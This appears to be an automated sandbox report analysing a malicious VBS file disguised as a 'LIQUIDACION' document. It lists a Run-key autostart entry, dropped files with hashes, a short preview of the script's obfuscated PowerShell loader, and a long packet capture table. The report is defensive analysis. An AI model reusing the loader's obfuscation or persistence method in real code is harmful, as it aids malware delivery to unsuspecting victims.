                                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
06:04:38 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run YDN4C C:\Program Files (x86)\windows mail\wab.exe
06:04:46 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run YDN4C C:\Program Files (x86)\windows mail\wab.exe
07:03:01 | API Interceptor | 7613x Sleep call for process: powershell.exe modified
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):11608
                                        Entropy (8bit):4.886255615007755
                                        Encrypted:false
                                        SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                        MD5:C7F7A26360E678A83AFAB85054B538EA
                                        SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                        SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                        SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                        Malicious:false
                                        Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:Nlllultnxj:NllU
                                        MD5:F93358E626551B46E6ED5A0A9D29BD51
                                        SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                        SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                        SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                        Malicious:false
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\replace.exe
                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                        Category:dropped
                                        Size (bytes):196608
                                        Entropy (8bit):1.1221538113908904
                                        Encrypted:false
                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                        MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                        SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                        SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                        SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                        Malicious:false
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):477016
                                        Entropy (8bit):5.958330204548628
                                        Encrypted:false
                                        SSDEEP:12288:hRNZEuumK0kt/vxx0NTtVlJvW065x2Yn3f:hbZEuumhiYBZJvOBv
                                        MD5:B3B2AC793EF703D0D9BFBE6ED03FF37B
                                        SHA1:A04C56371FF86CF64BEE38CB9CEA5B093860A73A
                                        SHA-256:7CB59FA65DA4CF4C5E46C7FFBEF92A03BCE2248522AD6EA7534BB9FC2FFFC97D
                                        SHA-512:3364F5E9301800EBD350C9A52034D93820659C98FD3401109234D2FE1179CBB7422D6001F498E5CC2A6F7BE31BA4DD6262C3694EDBB63A1E44B7B7F0FBC89A27
                                        Malicious:false
                                        File type:ASCII text, with very long lines (363), with CRLF line terminators
                                        Entropy (8bit):5.322168090230989
                                        TrID:
                                        • Visual Basic Script (13500/0) 100.00%
                                        File name:1000901 LIQUIDACION.vbs
                                        File size:8'153 bytes
                                        MD5:14ac5b0600701be4d0ed3990a64efce4
                                        SHA1:45778f2240e082952eb68ec11885ccee168498de
                                        SHA256:598ef0ef2670ff8f0dfa5f9849e1723a8a4c20e470a23b6b67d72db9e9146007
                                        SHA512:349bfc074f6126c3a655e79f10d2d025d6f5dce2516a5f22de45c1e16880db0e1de68fab9a5d96f26c23daca1dd52ca2bc59755816095771400fcc221d5e3bd0
                                        SSDEEP:192:bQfN+w0wVnV0OH/K8ta5D42iwtp1riA827jLuo1v109W6O:0+wLfaq2/tp1ri52vLfrcO
                                        TLSH:8DF1299A044371E4896315F1F09FED297628471C8475ECA3B93F20EF09B1EB460BF669
                                        File Content Preview:.. ..Function Rapunselens ......Ko1 = Ko1 & "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alask
                                        Icon Hash:68d69b8f86ab9a86
                                        Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                        Apr 24, 2024 07:03:06.810204029 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.812993050 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.813065052 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.813071012 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.815879107 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.815956116 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.815968990 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.818836927 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.818922043 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.818933964 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.821502924 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.821580887 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.821593046 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.824461937 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.824544907 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.824558020 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.826369047 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.826456070 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.826472998 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.828681946 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.828773975 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.828787088 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.831690073 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.831816912 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.831831932 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.837012053 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.837086916 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.837094069 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.839507103 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.839580059 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.839586973 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.840718031 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.840773106 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.840778112 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.843254089 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.843327045 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.843333960 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.845889091 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.845963955 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.845969915 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.848696947 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.848758936 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.848764896 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.851142883 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.851219893 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.851227045 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.853667021 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.853754044 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.853760004 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.855918884 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.855998039 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.856010914 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.858191013 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.858278990 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.858292103 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.860593081 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.860742092 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.860755920 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.863004923 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.863074064 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.863086939 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.865145922 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.865206003 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.865211964 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.867381096 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.867451906 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.867458105 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.870759964 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.870825052 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.870830059 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.875478983 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.875559092 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.875564098 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.878715992 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.878803015 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.878808022 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.878832102 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.878875017 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.881817102 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.886465073 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.886571884 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.886578083 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.886604071 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.886660099 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.887583017 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.889512062 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.889563084 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.889636993 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.889651060 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.889714003 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.891901970 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.893745899 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.893784046 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.893830061 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.893851042 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.893906116 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.895880938 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.898646116 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.898730993 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.898736000 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.898761034 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.898811102 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.899605989 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.905193090 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.905265093 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.905282021 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.905396938 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.905431032 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.905450106 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.905466080 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.905518055 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.909282923 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.910259008 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.910348892 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.910365105 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.911691904 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.911729097 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.911762953 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.911767006 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.911778927 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.911818027 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.911885977 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.911937952 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.911951065 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.913924932 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.914012909 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.914040089 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.915900946 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.915977001 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.915994883 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.917764902 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.917851925 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.917867899 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.919580936 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.919661999 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.919676065 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.921436071 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.921513081 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.921530008 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.923072100 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.923141003 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.923161030 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.924695015 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.924750090 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.924765110 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.926330090 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.926389933 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.926403046 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.927769899 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.927856922 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.927874088 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.930618048 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.930670023 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.930675983 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.930692911 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.930741072 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.931366920 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.932976961 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.933011055 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.933042049 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.933063030 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.933116913 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.934803963 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.936264038 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.936286926 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.936345100 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.936361074 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.936413050 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.937712908 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.939404011 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.939434052 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.939474106 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.939497948 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.939549923 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.940794945 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.942373037 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.942425966 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.942464113 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.942503929 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.942558050 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.943785906 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.945127010 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.945156097 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.945207119 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.945219994 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.945266962 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.946751118 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.948194981 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.948267937 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.948278904 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.949500084 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.949557066 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.949563026 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.950891018 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.950937986 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.950944901 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.952142954 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.952200890 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.952207088 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.953520060 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.953572035 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.953579903 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.954976082 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.955039024 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.955044985 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.956559896 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.956618071 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.956661940 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.956671000 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.956717014 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.958200932 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.959719896 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.959769964 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.959769964 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.959781885 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.959820986 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.961363077 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.963018894 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.963066101 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.963076115 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.963850021 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.963896990 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.963905096 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.965320110 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.965372086 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.965379953 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.966814041 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.966876984 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.966885090 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.968142986 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.968194962 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.968203068 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.969764948 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.969825029 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.969831944 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.970771074 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.970829010 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.970837116 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.971759081 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.971811056 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.971817970 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.972970009 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.973021030 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.973028898 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.974137068 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.974195957 CEST49707443192.168.2.9142.251.2.132
                                        Apr 24, 2024 07:03:06.974205971 CEST44349707142.251.2.132192.168.2.9
                                        Apr 24, 2024 07:03:06.975547075 CEST44349707142.251.2.132192.168.2.9
